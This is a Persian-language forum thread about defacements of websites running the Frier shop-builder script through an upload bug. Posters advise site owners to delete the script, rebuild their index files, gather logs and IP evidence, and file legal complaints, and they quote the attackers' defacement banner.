فروشگاه ساز فریر رو از روی هاست پاک کنید و لاگها فراموش نشه با کمک مدیر هاستتون تمامیه اتصالات و ip هایی که آپلود انجام دادن بسادگی قابل شناسایی و حتماً بصورت دستی داخل فرم اول آدرس ip را بنویسید که البته چندتا ip بودن که همه رو نوشتم در آخر هم هر گونه پرداخت احتمالی و مکاتبه با این افراد دارید از شماره کارت و واریز و هر روشی که ازشون دارید پرینت تهیه کنید من حتی از صفحاتی که با 3 طرح و متن متفاوت روی سایتم توسط index قرار دادن پرینت تهیه کردم و ضمیمه کردم اینا هر نقطه ایی از ایران باشن در نهایت بعد از شناسایی توسط دادگاه نیابت پرونده به شهر و استانشون ارجاع میشه %
من از تابلو اعلانات اونجا هم شماره های مراکز تهران و حومه رو برداشتم که دوستان تمایل به پیگیری داشتن میتونم بصورت خصوصی شماره ها را در اختیارشون بگذارم .

در مورد موضوع تاپیک :
الان اصلاً مدیر تیم امنیتی و کانفیگ های امنیتی هاست مهم نیست ، اسکریپت فریر دچار باگهای زیادیه از جمله سطح دسترسی آپلود فایل روی هاست حالا این جوجه هکرهای حقه باز که آبروی هرچی هکر رو بردن با استفاده از باگ موجود در فایلی که در پست های قبلی اشاره کردم اقدام به آپلود فایل index روی هاست میکنن نه علم نفوذ و هک دارن و نه افراد ماهری هستند مطمئنن کودکستان و مهدکودک آخر سال تعطیل شده و اینا افتادن به جونه سایتهایی که از این اسکریپت استفاده میکنن چاره کار هم فقط حذف کامل فایلهای فریر هست ...

سرچ کردم اسمشو
اکثرا ویبولتین و وردپرس هک کرده!
صد دفه گفتیم اکسپلویت ندید دست بچه.همین میشه.میوفته به جون سایتای ایرانی.
خود ایران سایبر هم هک کرده:))))
چند تا سایت هم رو هاست دی ال بودند
اینو همون برید شکایت کنید از دستش خفتش کنن یه گوشمالی بهش بدن درست میشه مشکل حادی نیست

وبمستر (http://forums.irserv.net/showthread.php?tid=1409&pid=2231&google_seo_redirect=debug#pid2231)گرامی اگر بروی سایت خودتون با پیغام زیر

! Owned By Sir.H4m1D !

و متن های مشابه

! Baraye Amniyate Bishtar Ba Ma Dar Tamas Bashid !

! YID : ir0ni !
! Fr : Alireza_Promis | Mr.Turk | Mohammad.Nofozi | Mohammad.Black | And You ... !

مواجه شدید ، بدون هیچ نگرانی ابتدا اسکریپت فروشگاه ساز فریر خود را بطور کامل ( تمامیه فایلهای مربوط به این اسکریپت ) پاک کرده و سپس فایل index خود را باز سازی نمایید چون سایت شما هک نشده و تعدادی حقه باز از طریق اسکریپت فریر فکر اخاذی از شما را دارند . (http://forums.irserv.net/showthread.php?tid=1409&pid=2231&google_seo_redirect=debug#pid2231)




- - - Updated - - -

ماجرای جوجه هکر ایرانی اعظم خانم (sheytan azzam) و جنرال الکتریک (general.eshgh)
(http://irserv.ir/showthread.php?tid=1420&pid=2247#pid2247)